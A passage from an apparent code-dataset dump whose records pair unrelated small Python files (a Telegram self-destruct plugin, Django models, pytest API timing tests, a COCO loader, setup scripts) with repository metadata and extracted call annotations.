MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((164, 21, 164, 38), 'src.ast_nodes.BooleanNode', 'BooleanNode', ({(164, 33, 164, 37): 's[1]'}, {}), '(s[1])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((166, 32, 166, 49), 'src.ast_nodes.BooleanNode', 'BooleanNode', ({(166, 44, 166, 48): 's[1]'}, {}), '(s[1])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n'), ((167, 33, 167, 49), 'src.ast_nodes.StringNode', 'StringNode', ({(167, 44, 167, 48): 's[1]'}, {}), '(s[1])', False, 'from src.ast_nodes import ProgramNode, ClassDeclarationNode, FuncDeclarationNode, AttrDeclarationNode, IfNode, WhileNode, LetNode, CaseNode, IsvoidNode, AssignNode, VarDeclarationNode, CaseItemNode, NotNode, LessNode, LessEqualNode, EqualNode, PlusNode, MinusNode, StarNode, DivNode, NegNode, InstantiateNode, BlockNode, CallNode, ConstantNumNode, VariableNode, BooleanNode, StringNode\n')] |
Aliensuniquebot/CatUserbot | userbot/plugins/selfdestruct.py | 93561a620fc1198c6fe6c259412088f4bc81d97b | # For @UniBorg
# courtesy Yasir siddiqui
"""Self Destruct Plugin
.sd <time in seconds> <text>
"""
import time
from userbot import CMD_HELP
from telethon.errors import rpcbaseerrors
from userbot.utils import admin_cmd
import importlib.util
@borg.on(admin_cmd(pattern="sdm", outgoing=True))
async def selfdestruct(destroy):
if not destroy.text[0].isalpha() and destroy.text[0] not in ("/", "#", "@", "!"):
message = destroy.text
counter = int(message[5:7])
text = str(destroy.text[7:])
text = (
text
)
await destroy.delete()
smsg = await destroy.client.send_message(destroy.chat_id, text)
time.sleep(counter)
await smsg.delete()
@borg.on(admin_cmd(pattern="selfd", outgoing=True ))
async def selfdestruct(destroy):
if not destroy.text[0].isalpha() and destroy.text[0] not in ("/", "#", "@", "!"):
message = destroy.text
counter = int(message[7:9])
text = str(destroy.text[9:])
text = (
text
+ "\n\n`This message shall be self-destructed in "
+ str(counter)
+ " seconds`"
)
await destroy.delete()
smsg = await destroy.client.send_message(destroy.chat_id, text)
time.sleep(counter)
await smsg.delete()
CMD_HELP.update({
"selfdestruct":
".sdm number | [text]\
\nUsage: self destruct this message in number seconds \
\n\n.self number | [text]\
\nUsage:self destruct this message in number seconds with showing that it will destruct. \
"
})
| [((49, 0, 56, 2), 'userbot.CMD_HELP.update', 'CMD_HELP.update', ({(49, 16, 56, 1): '{\'selfdestruct\':\n """.sdm number | [text]\nUsage: self destruct this message in number seconds \n\n.self number | [text]\nUsage:self destruct this message in number seconds with showing that it will destruct. """\n }'}, {}), '({\'selfdestruct\':\n """.sdm number | [text]\nUsage: self destruct this message in number seconds \n\n.self number | [text]\nUsage:self destruct this message in number seconds with showing that it will destruct. """\n })', False, 'from userbot import CMD_HELP\n'), ((16, 9, 16, 48), 'userbot.utils.admin_cmd', 'admin_cmd', (), '', False, 'from userbot.utils import admin_cmd\n'), ((31, 9, 31, 52), 'userbot.utils.admin_cmd', 'admin_cmd', (), '', False, 'from userbot.utils import admin_cmd\n'), ((27, 8, 27, 27), 'time.sleep', 'time.sleep', ({(27, 19, 27, 26): 'counter'}, {}), '(counter)', False, 'import time\n'), ((45, 8, 45, 27), 'time.sleep', 'time.sleep', ({(45, 19, 45, 26): 'counter'}, {}), '(counter)', False, 'import time\n')] |
OSAMAMOHAMED1234/python_projects | snippets/basic_render_template_class.py | fb4bc7356847c3f46df690a9386cf970377a6f7c | import os
class Template:
template_name = ''
context = None
def __init__(self, template_name='', context=None, *args, **kwargs):
self.template_name = template_name
self.context = context
def get_template(self):
template_path = os.path.join(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'templates'), self.template_name)
if not os.path.exists(template_path):
raise Exception(f'This path does not exist : {template_path}')
template_string = ''
with open(template_path, 'r') as f:
template_string = f.read()
return template_string
def render(self, context=None):
render_ctx = context
if self.context != None:
render_ctx = self.context
if not isinstance(render_ctx, dict):
render_ctx = {}
template_string = self.get_template()
return template_string.format(**render_ctx)
obj = Template(template_name='test.html', context={'name': 'OSAMA'})
print(obj.render())
obj.context= None
print(obj.render(context={'name': 'os'}))
obj2 = Template(template_name='test.html')
print(obj2.render(context={'name': 'os'})) | [((12, 11, 12, 40), 'os.path.exists', 'os.path.exists', ({(12, 26, 12, 39): 'template_path'}, {}), '(template_path)', False, 'import os\n'), ((11, 62, 11, 87), 'os.path.abspath', 'os.path.abspath', ({(11, 78, 11, 86): '__file__'}, {}), '(__file__)', False, 'import os\n')] |
jameskzhao/python36 | level_one/strings.py | 855e8a6e164065702efa7773da1f089454fdcbcc | #Basics
a = "hello"
a += " I'm a dog"
print(a)
print(len(a))
print(a[1:]) #Output: ello I'm a dog
print(a[:5]) #Output: hello(index 5 is not included)
print(a[2:5])#Output: llo(index 2 is included)
print(a[::2])#Step size
#string is immutable so you can't assign a[1]= b
x = a.upper()
print(x)
x = a.capitalize()
print(x)
x = a.split('e')
print(x)
x = a.split() #splits the string by space
print(x)
x = a.strip() #removes any whitespace from beginning or the end
print(x)
x = a.replace('l','xxx')
print(x)
x = "Insert another string here: {}".format('insert me!')
x = "Item One: {} Item Two: {}".format('dog', 'cat')
print(x)
x = "Item One: {m} Item Two: {m}".format(m='dog', n='cat')
print(x)
#command-line string input
print("Enter your name:")
x = input()
print("Hello: {}".format(x)) | [] |
glushkovvv/test_2gis | tests/test_01_accept_time_get_headers.py | 2affff49411a3c7ff77e9d399ec86eb314aa3757 | # -*- coding: utf-8 -*-
"""
test_01_accept_time_get_headers
~~~~~~~~~~~~~~
The 2GIS API Test
Check time get headers
:author: Vadim Glushkov
:copyright: Copyright 2019, The2GIS API Test"
:license: MIT
:version: 1.0.0
:maintainer: Vadim Glushkov
:email: [email protected]
:status: Development
"""
import pytest
import allure
from tools.api_responses import get_response
@allure.epic("Поизитивные тесты API")
@allure.suite("Позитивное тестирование время ответов")
@allure.title("Проверка время ответа при нечётком поиске, при фильтрации по коду страны, при постраничной разбивке")
@pytest.mark.parametrize("json_params", [{"page": 1, "page_size": 5},
{"country_code": "ru", "page": 1, "page_size": 5},
{"q": "ОРСК"}])
def test_01_time_response_for_valid_request(setup_option, json_params):
"""
Проверяем время ответов сервера при валидных запросах
:param setup_option: Установочные параметры
:type setup_option: dict
:param json_params: Параметры GET запроса
:type json_params: dict
:return:
"""
api_url = setup_option['site_url']
request_params = json_params
api_response = get_response(api_url, request_params)
testing_message = (f" EndPoint: {api_response.url}\n"
f" Status: {api_response.status_code}\n"
f" Headers: {api_response.headers}\n"
f" Content: {api_response.content}")
check = api_response.elapsed.total_seconds() <= 0.2
assert check, f"""Время ответа {api_response.elapsed.total_seconds()} больше 0.2 сек\r\n""" + testing_message
@allure.epic("Смок тесты API")
@allure.suite("Позитивное тестирование время ответов")
@allure.title("Проверка время ответа при нечётком поиске, при фильтрации по коду страны, при постраничной разбивке")
@pytest.mark.parametrize("json_params", [{"page": 1, "page_size": 2},
{"country_code": "tz", "page": 1, "page_size": 5},
{"q": "ОР"}])
def test_01_time_response_for_invalid_request(setup_option, json_params):
"""
Проверяем время ответов сервера при невалидных запросах
:param setup_option: Установочные параметры
:type setup_option: dict
:param json_params: Параметры GET запроса
:type json_params: dict
:return:
"""
api_url = setup_option['site_url']
request_params = json_params
api_response = get_response(api_url, request_params)
testing_message = (f" EndPoint: {api_response.url}\n"
f" Status: {api_response.status_code}\n"
f" Headers: {api_response.headers}\n"
f" Content: {api_response.content}")
check = api_response.elapsed.total_seconds() <= 0.5
assert check, f"""Время ответа {api_response.elapsed.total_seconds()} больше 0.5 сек\r\n""" + testing_message
| [((24, 1, 24, 53), 'allure.epic', 'allure.epic', ({(24, 13, 24, 52): '"""Поизитивные тесты API"""'}, {}), "('Поизитивные тесты API')", False, 'import allure\n'), ((25, 1, 25, 88), 'allure.suite', 'allure.suite', ({(25, 14, 25, 87): '"""Позитивное тестирование время ответов"""'}, {}), "('Позитивное тестирование время ответов')", False, 'import allure\n'), ((26, 1, 26, 200), 'allure.title', 'allure.title', ({(26, 14, 26, 199): '"""Проверка время ответа при нечётком поиске, при фильтрации по коду страны, при постраничной разбивке"""'}, {}), "(\n 'Проверка время ответа при нечётком поиске, при фильтрации по коду страны, при постраничной разбивке'\n )", False, 'import allure\n'), ((27, 1, 29, 60), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ({(27, 25, 27, 38): '"""json_params"""', (27, 40, 29, 59): "[{'page': 1, 'page_size': 5}, {'country_code': 'ru', 'page': 1, 'page_size':\n 5}, {'q': 'ОРСК'}]"}, {}), "('json_params', [{'page': 1, 'page_size': 5}, {\n 'country_code': 'ru', 'page': 1, 'page_size': 5}, {'q': 'ОРСК'}])", False, 'import pytest\n'), ((51, 1, 51, 39), 'allure.epic', 'allure.epic', ({(51, 13, 51, 38): '"""Смок тесты API"""'}, {}), "('Смок тесты API')", False, 'import allure\n'), ((52, 1, 52, 88), 'allure.suite', 'allure.suite', ({(52, 14, 52, 87): '"""Позитивное тестирование время ответов"""'}, {}), "('Позитивное тестирование время ответов')", False, 'import allure\n'), ((53, 1, 53, 200), 'allure.title', 'allure.title', ({(53, 14, 53, 199): '"""Проверка время ответа при нечётком поиске, при фильтрации по коду страны, при постраничной разбивке"""'}, {}), "(\n 'Проверка время ответа при нечётком поиске, при фильтрации по коду страны, при постраничной разбивке'\n )", False, 'import allure\n'), ((54, 1, 56, 56), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ({(54, 25, 54, 38): '"""json_params"""', (54, 40, 56, 55): "[{'page': 1, 'page_size': 2}, {'country_code': 'tz', 'page': 1, 'page_size':\n 5}, {'q': 'ОР'}]"}, {}), "('json_params', [{'page': 1, 'page_size': 2}, {\n 'country_code': 'tz', 'page': 1, 'page_size': 5}, {'q': 'ОР'}])", False, 'import pytest\n'), ((42, 19, 42, 56), 'tools.api_responses.get_response', 'get_response', ({(42, 32, 42, 39): 'api_url', (42, 41, 42, 55): 'request_params'}, {}), '(api_url, request_params)', False, 'from tools.api_responses import get_response\n'), ((69, 19, 69, 56), 'tools.api_responses.get_response', 'get_response', ({(69, 32, 69, 39): 'api_url', (69, 41, 69, 55): 'request_params'}, {}), '(api_url, request_params)', False, 'from tools.api_responses import get_response\n')] |
ucds-sg/h2oai | transformers/string/strlen_transformer.py | 7042860767dc25d1a7d7122103bbd5016d02df53 | """Returns the string length of categorical values"""
from h2oaicore.transformer_utils import CustomTransformer
import datatable as dt
import numpy as np
class MyStrLenEncoderTransformer(CustomTransformer):
@staticmethod
def get_default_properties():
return dict(col_type="any", min_cols=1, max_cols=1, relative_importance=1)
def fit_transform(self, X: dt.Frame, y: np.array = None):
return self.transform(X)
def transform(self, X: dt.Frame):
return X.to_pandas().astype(str).iloc[:, 0].str.len()
| [] |
eerzin/eo-learn | geometry/eolearn/geometry/__init__.py | 53c5cc229de13b98b5778aeb1d45950c25bf2f95 | """
Subpackage containing EOTasks for geometrical transformations
"""
from .utilities import ErosionTask, VectorToRaster, RasterToVector
from .sampling import PointSamplingTask, PointSampler, PointRasterSampler
__version__ = '0.4.2'
| [] |
felipebarraza6/startup_comedy | api/models/users.py | 42b4a4547bffc0d7cf34ace520355d80053bbd9e | """User Model."""
# Django
from django.db import models
from django.contrib.auth.models import AbstractUser
# Utilities
from .utils import ApiModel
class User(ApiModel, AbstractUser):
email = models.EmailField(
'email',
unique = True,
)
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['username', 'first_name', 'last_name']
is_student = models.BooleanField(default=False)
class Meta:
verbose_name='Usuario'
verbose_name_plural='Usuarios'
def __str__(self):
return self.username
def get_short_name(self):
return self.username
class ProfileUser(ApiModel):
user = models.OneToOneField(User, on_delete=models.CASCADE)
approved_courses = models.ManyToManyField('api.ResultContest',
related_name='user_aproved_courses', blank=True, null=True)
tests_performed = models.ManyToManyField('api.ResultTest',
related_name='user_result_test', blank=True)
class Meta:
verbose_name = 'Usuario - Perfil'
verbose_name_plural = 'Usuarios - Perfiles'
def __str__(self):
return str(self.user)
| [((13, 12, 16, 5), 'django.db.models.EmailField', 'models.EmailField', (), '', False, 'from django.db import models\n'), ((21, 17, 21, 51), 'django.db.models.BooleanField', 'models.BooleanField', (), '', False, 'from django.db import models\n'), ((35, 11, 35, 63), 'django.db.models.OneToOneField', 'models.OneToOneField', (), '', False, 'from django.db import models\n'), ((36, 23, 37, 71), 'django.db.models.ManyToManyField', 'models.ManyToManyField', (), '', False, 'from django.db import models\n'), ((38, 22, 39, 56), 'django.db.models.ManyToManyField', 'models.ManyToManyField', (), '', False, 'from django.db import models\n')] |
m-bo-one/ethereumd-proxy | tests/test_server.py | 1d1eb3905dac4b28a8e23c283214859a13f6e020 | from collections import namedtuple
import json
from asynctest.mock import patch
import pytest
from ethereumd.server import RPCServer
from ethereumd.proxy import EthereumProxy
from aioethereum.errors import BadResponseError
from .base import BaseTestRunner
Request = namedtuple('Request', ['json'])
class TestServer(BaseTestRunner):
run_with_node = True
async def init_server(self, loop):
server = RPCServer()
with patch('ethereumd.poller.Poller.poll'):
await server.before_server_start()(None, loop)
return server
@pytest.mark.asyncio
async def test_server_handler_index_success_call(self, event_loop):
server = await self.init_server(event_loop)
data = {
'jsonrpc': '2.0',
'method': 'getblockcount',
'params': [],
'id': 'test',
}
request = Request(json=data)
response = await server.handler_index(request)
parsed = json.loads(response.body)
assert parsed['error'] is None
assert isinstance(parsed['result'], int)
@pytest.mark.asyncio
async def test_server_handler_index_invalid_rpc_data(self, event_loop):
server = await self.init_server(event_loop)
data = {
'jsonrpc': '2.0',
'method': 'getblockcount',
'id': 'test',
}
request = Request(json=data)
response = await server.handler_index(request)
parsed = json.loads(response.body)
assert parsed['error']['code'] == -32602
assert parsed['error']['message'] == 'Invalid rpc 2.0 structure'
assert parsed['result'] is None
@pytest.mark.asyncio
async def test_server_handler_index_attr_error_call(self, event_loop):
server = await self.init_server(event_loop)
data = {
'jsonrpc': '2.0',
'method': 'getblockcount',
'params': [],
'id': 'test',
}
request = Request(json=data)
def _raise_error():
raise AttributeError('bla bla method not found')
with patch.object(EthereumProxy, 'getblockcount',
side_effect=_raise_error):
response = await server.handler_index(request)
parsed = json.loads(response.body)
assert parsed['error']['code'] == -32601
assert parsed['error']['message'] == 'Method not found'
assert parsed['result'] is None
@pytest.mark.asyncio
async def test_server_handler_index_type_error_call(self, event_loop):
server = await self.init_server(event_loop)
data = {
'jsonrpc': '2.0',
'method': 'getblockcount',
'params': [],
'id': 'test',
}
request = Request(json=data)
def _raise_error():
raise TypeError('test')
with patch.object(EthereumProxy, 'getblockcount',
side_effect=_raise_error):
response = await server.handler_index(request)
parsed = json.loads(response.body)
assert parsed['error']['code'] == -1
assert parsed['error']['message'] == 'test'
assert parsed['result'] is None
@pytest.mark.asyncio
async def test_server_handler_index_bad_response_call(self, event_loop):
server = await self.init_server(event_loop)
data = {
'jsonrpc': '2.0',
'method': 'getblockcount',
'params': [],
'id': 'test',
}
request = Request(json=data)
def _raise_error():
raise BadResponseError('test', code=-99999999)
with patch.object(EthereumProxy, 'getblockcount',
side_effect=_raise_error):
response = await server.handler_index(request)
parsed = json.loads(response.body)
assert parsed['error']['code'] == -99999999
assert parsed['error']['message'] == 'test'
assert parsed['result'] is None
| [((14, 10, 14, 41), 'collections.namedtuple', 'namedtuple', ({(14, 21, 14, 30): '"""Request"""', (14, 32, 14, 40): "['json']"}, {}), "('Request', ['json'])", False, 'from collections import namedtuple\n'), ((22, 17, 22, 28), 'ethereumd.server.RPCServer', 'RPCServer', ({}, {}), '()', False, 'from ethereumd.server import RPCServer\n'), ((38, 17, 38, 42), 'json.loads', 'json.loads', ({(38, 28, 38, 41): 'response.body'}, {}), '(response.body)', False, 'import json\n'), ((52, 17, 52, 42), 'json.loads', 'json.loads', ({(52, 28, 52, 41): 'response.body'}, {}), '(response.body)', False, 'import json\n'), ((73, 17, 73, 42), 'json.loads', 'json.loads', ({(73, 28, 73, 41): 'response.body'}, {}), '(response.body)', False, 'import json\n'), ((94, 17, 94, 42), 'json.loads', 'json.loads', ({(94, 28, 94, 41): 'response.body'}, {}), '(response.body)', False, 'import json\n'), ((115, 17, 115, 42), 'json.loads', 'json.loads', ({(115, 28, 115, 41): 'response.body'}, {}), '(response.body)', False, 'import json\n'), ((23, 13, 23, 50), 'asynctest.mock.patch', 'patch', ({(23, 19, 23, 49): '"""ethereumd.poller.Poller.poll"""'}, {}), "('ethereumd.poller.Poller.poll')", False, 'from asynctest.mock import patch\n'), ((70, 13, 71, 51), 'asynctest.mock.patch.object', 'patch.object', (), '', False, 'from asynctest.mock import patch\n'), ((91, 13, 92, 51), 'asynctest.mock.patch.object', 'patch.object', (), '', False, 'from asynctest.mock import patch\n'), ((111, 18, 111, 58), 'aioethereum.errors.BadResponseError', 'BadResponseError', (), '', False, 'from aioethereum.errors import BadResponseError\n'), ((112, 13, 113, 51), 'asynctest.mock.patch.object', 'patch.object', (), '', False, 'from asynctest.mock import patch\n')] |
evdcush/neorl | neorl/rl/baselines/readme.py | a1af069072e752ab79e7279a88ad95d195a81821 | # This file is part of NEORL.
# Copyright (c) 2021 Exelon Corporation and MIT Nuclear Science and Engineering
# NEORL is free software: you can redistribute it and/or modify
# it under the terms of the MIT LICENSE
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#NEORL team thanks stable-baselines as we have used their own implementation of different RL
#algorathims to establish NEORL optimizers. We have used the files in this open-source repo:
#https://github.com/hill-a/stable-baselines | [] |
sushantPatrikar/WaveCompartor | Compare.py | 112395287b41c1b5533924ebe293c5641647a5e3 | from scipy.io import wavfile
import numpy as np
import pingouin as pg
import pandas as pd
_,data = wavfile.read('wav//ed//mp3baked.wav')
_,data1 = wavfile.read('wav//ing//ingeating.wav')
i= data.shape[0]-1
j = data1.shape[0]-1
index_1 = -1
index_2 = -1
try:
data.shape[1]
except IndexError:
data = data.reshape(data.shape[0],1)
try:
data1.shape[1]
except IndexError:
data1 = data1.reshape(data1.shape[0],1)
while True:
if data[i,0] !=0 and index_1==-1:
index_1 = i
pass
if data1[j,0] !=0 and index_2==-1:
index_2 = j
pass
if index_1!=-1 and index_2!=-1:
break
i-=1
j-=1
data = data[-index_1:,:]
data1 = data1[-index_2:,:]
data = data[-2000:,:]
data1= data1[-2000:,:]
x =pg.corr(x=data[:,0],y=data1[:,0])
print(x)
# print(data.tostring())
# print(data1.tostring())
# data = data[:,:]
# data1 = data1[:,:]
# data = data.reshape(data.shape[0],1)
# data1 = data1.reshape(data1.shape[0],1)
# data = data[-10000:,:]
# data1 = data1[-10000:,:]
# print(data1.shape[1])
# df = pd.DataFrame(data,data1)
# print(df.head())
# print(data1.shape)
# data = data[-5000:,:]
# data1 = data1[-5000:,:]
# #
# x =pg.corr(x=data[:,0],y=data1[:,0])
# print(x)
| [((6, 9, 6, 46), 'scipy.io.wavfile.read', 'wavfile.read', ({(6, 22, 6, 45): '"""wav//ed//mp3baked.wav"""'}, {}), "('wav//ed//mp3baked.wav')", False, 'from scipy.io import wavfile\n'), ((7, 10, 7, 49), 'scipy.io.wavfile.read', 'wavfile.read', ({(7, 23, 7, 48): '"""wav//ing//ingeating.wav"""'}, {}), "('wav//ing//ingeating.wav')", False, 'from scipy.io import wavfile\n'), ((44, 3, 44, 36), 'pingouin.corr', 'pg.corr', (), '', True, 'import pingouin as pg\n')] |
sco1/pylox | tests/comments/test_only_block_comment.py | b4820828306c20cee3f8533c2547fafb92c6c1bd | from textwrap import dedent
import pytest
from pylox.lox import Lox
TEST_SRC = dedent(
"""\
/*
This is a multiline block comment
*/
"""
)
EXPECTED_STDOUTS: list[str] = []
def test_block_comment_at_eof(capsys: pytest.CaptureFixture) -> None:
interpreter = Lox()
interpreter.run(TEST_SRC)
assert not interpreter.had_error
assert not interpreter.had_runtime_error
all_out = capsys.readouterr().out.splitlines()
assert all_out == EXPECTED_STDOUTS
| [((7, 11, 13, 1), 'textwrap.dedent', 'dedent', ({(8, 4, 12, 7): '""" /*\n This is a multiline block comment\n */\n """'}, {}), '(""" /*\n This is a multiline block comment\n */\n """)', False, 'from textwrap import dedent\n'), ((19, 18, 19, 23), 'pylox.lox.Lox', 'Lox', ({}, {}), '()', False, 'from pylox.lox import Lox\n')] |
n-kats/mlbase | mlbase/lazy.py | 7d69f259dcaf9608a921523083458fa6d0d6914b | from mlbase.utils.misc import lazy
tensorflow = lazy("tensorflow")
numpy = lazy("numpy")
gensim = lazy("gensim")
| [((3, 13, 3, 31), 'mlbase.utils.misc.lazy', 'lazy', ({(3, 18, 3, 30): '"""tensorflow"""'}, {}), "('tensorflow')", False, 'from mlbase.utils.misc import lazy\n'), ((4, 8, 4, 21), 'mlbase.utils.misc.lazy', 'lazy', ({(4, 13, 4, 20): '"""numpy"""'}, {}), "('numpy')", False, 'from mlbase.utils.misc import lazy\n'), ((5, 9, 5, 23), 'mlbase.utils.misc.lazy', 'lazy', ({(5, 14, 5, 22): '"""gensim"""'}, {}), "('gensim')", False, 'from mlbase.utils.misc import lazy\n')] |
sturmianseq/observed | setup.py | d99fb99ff2a470a86efb2763685e8e2c021e799f | import re
import setuptools
README_FILENAME = "README.md"
VERSION_FILENAME = "observed.py"
VERSION_RE = r"^__version__ = ['\"]([^'\"]*)['\"]"
# Get version information
with open(VERSION_FILENAME, "r") as version_file:
mo = re.search(VERSION_RE, version_file.read(), re.M)
if mo:
version = mo.group(1)
else:
msg = "Unable to find version string in %s." % (version_file,)
raise RuntimeError(msg)
# Get description information
with open(README_FILENAME, "r") as description_file:
long_description = description_file.read()
setuptools.setup(
name="observed",
version=version,
author="Daniel Sank",
author_email="[email protected]",
description="Observer pattern for functions and bound methods",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/DanielSank/observed",
py_modules=["observed"],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
| [((24, 0, 39, 1), 'setuptools.setup', 'setuptools.setup', (), '', False, 'import setuptools\n')] |
catalyst-team/detector | src/coco.py | 383c17ba7701d960ca92be0aafbff05207f2de3a | import os
import json
import numpy as np
import pickle
from typing import Any
from pycocotools.coco import COCO
from torch.utils.data import Dataset
class DetectionMSCOCODataset(Dataset):
def __init__(self, annotation_file: str, image_dir: str):
self._annotation_file = annotation_file
self._image_dir = image_dir
self._cache_file = self._annotation_file + ".cache"
self._coco = COCO(self._annotation_file)
self._img_ids = self._coco.getImgIds()
self._cat_ids = self._coco.getCatIds()
self._ann_ids = self._coco.getAnnIds()
self._data = "coco"
self._classes = {
ind: cat_id for ind, cat_id in enumerate(self._cat_ids)
}
self._coco_to_class_map = {
value: key for key, value in self._classes.items()
}
self._load_data()
self._db_inds = np.arange(len(self._image_names))
self._load_coco_data()
def _load_data(self):
print("loading from cache file: {}".format(self._cache_file))
if not os.path.exists(self._cache_file):
print("No cache file found...")
self._extract_data()
with open(self._cache_file, "wb") as f:
pickle.dump([self._detections, self._image_names], f)
print("Cache file created")
else:
with open(self._cache_file, "rb") as f:
self._detections, self._image_names = pickle.load(f)
def _load_coco_data(self):
with open(self._annotation_file, "r") as f:
data = json.load(f)
coco_ids = self._coco.getImgIds()
eval_ids = {
self._coco.loadImgs(coco_id)[0]["file_name"]: coco_id
for coco_id in coco_ids
}
self._coco_categories = data["categories"]
self._coco_eval_ids = eval_ids
def class_name(self, cid):
cat_id = self._classes[cid]
cat = self._coco.loadCats([cat_id])[0]
return cat["name"]
def _extract_data(self):
self._image_names = [
self._coco.loadImgs(img_id)[0]["file_name"]
for img_id in self._img_ids
]
self._detections = {}
for ind, (coco_image_id, image_name) in enumerate(zip(self._img_ids, self._image_names)):
image = self._coco.loadImgs(coco_image_id)[0]
bboxes = []
categories = []
for cat_id in self._cat_ids:
annotation_ids = self._coco.getAnnIds(imgIds=image["id"], catIds=cat_id)
annotations = self._coco.loadAnns(annotation_ids)
category = self._coco_to_class_map[cat_id]
for annotation in annotations:
bbox = np.array(annotation["bbox"])
bbox[[2, 3]] += bbox[[0, 1]]
bboxes.append(bbox)
categories.append(category)
self._detections[image_name] = [{
'bbox': bbox.astype(np.float32),
'category_id': category,
'category_name': self.class_name(category)
} for bbox, category in zip(bboxes, categories)]
def __getitem__(self, ind: int) -> Any:
image_name = self._image_names[ind]
return {
'image_name': os.path.join(self._image_dir, image_name),
'detections': self._detections[image_name]
}
def __len__(self) -> int:
return len(self._img_ids)
def get_num_classes(self) -> int:
return len(self._cat_ids)
| [((18, 21, 18, 48), 'pycocotools.coco.COCO', 'COCO', ({(18, 26, 18, 47): 'self._annotation_file'}, {}), '(self._annotation_file)', False, 'from pycocotools.coco import COCO\n'), ((39, 15, 39, 47), 'os.path.exists', 'os.path.exists', ({(39, 30, 39, 46): 'self._cache_file'}, {}), '(self._cache_file)', False, 'import os\n'), ((51, 19, 51, 31), 'json.load', 'json.load', ({(51, 29, 51, 30): 'f'}, {}), '(f)', False, 'import json\n'), ((100, 26, 100, 67), 'os.path.join', 'os.path.join', ({(100, 39, 100, 54): 'self._image_dir', (100, 56, 100, 66): 'image_name'}, {}), '(self._image_dir, image_name)', False, 'import os\n'), ((43, 16, 43, 69), 'pickle.dump', 'pickle.dump', ({(43, 28, 43, 65): '[self._detections, self._image_names]', (43, 67, 43, 68): 'f'}, {}), '([self._detections, self._image_names], f)', False, 'import pickle\n'), ((47, 54, 47, 68), 'pickle.load', 'pickle.load', ({(47, 66, 47, 67): 'f'}, {}), '(f)', False, 'import pickle\n'), ((84, 27, 84, 55), 'numpy.array', 'np.array', ({(84, 36, 84, 54): "annotation['bbox']"}, {}), "(annotation['bbox'])", True, 'import numpy as np\n')] |
tadvi/uva | UVa 10105 polynomial coefficients/sample/main.py | 0ac0cbdf593879b4fb02a3efc09adbb031cb47d5 | import sys
import operator
sys.stdin = open('input.txt')
fact = [1, 1]
for i in range(2, 15):
fact.append(fact[-1] * i)
while True:
try:
n, k = map(int, raw_input().split())
coef = map(int, raw_input().split())
except:
break
print fact[n] / reduce(operator.mul, [fact[c] for c in coef])
| [] |
wallaceleonel/Flash-Cards | pynotes/note/models.py | fd563455d437f77e42ddf96133214cf752b62bb6 | from django.contrib.auth.models import User
from django.db import models
from django.urls import reverse
# Create your models here.
class Post(models.Model):
title = models.CharField(max_length=255)
slug = models.SlugField(max_length=255,unique=True)
#meusite.com/blog;introducao-ao-django
author = models.ForeignKey(User, on_delete=models.CASCADE)
body = models.TextField()
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ("-created",)
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse("note:detail", kwargs={"slug": self.slug})
| [((9, 12, 9, 44), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((10, 11, 10, 55), 'django.db.models.SlugField', 'models.SlugField', (), '', False, 'from django.db import models\n'), ((12, 13, 12, 62), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import models\n'), ((13, 11, 13, 29), 'django.db.models.TextField', 'models.TextField', ({}, {}), '()', False, 'from django.db import models\n'), ((14, 14, 14, 53), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import models\n'), ((15, 14, 15, 49), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import models\n'), ((25, 15, 25, 65), 'django.urls.reverse', 'reverse', (), '', False, 'from django.urls import reverse\n')] |
DmytroLiaskovskyi/incubator-dlab | infrastructure-provisioning/src/general/scripts/azure/common_notebook_configure_dataengine.py | af995e98b3b3cf526fb9741a3e5117dd1e04f3aa | #!/usr/bin/python
# *****************************************************************************
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# ******************************************************************************
import logging
import json
import sys
from dlab.fab import *
from dlab.meta_lib import *
from dlab.actions_lib import *
import os
import uuid
if __name__ == "__main__":
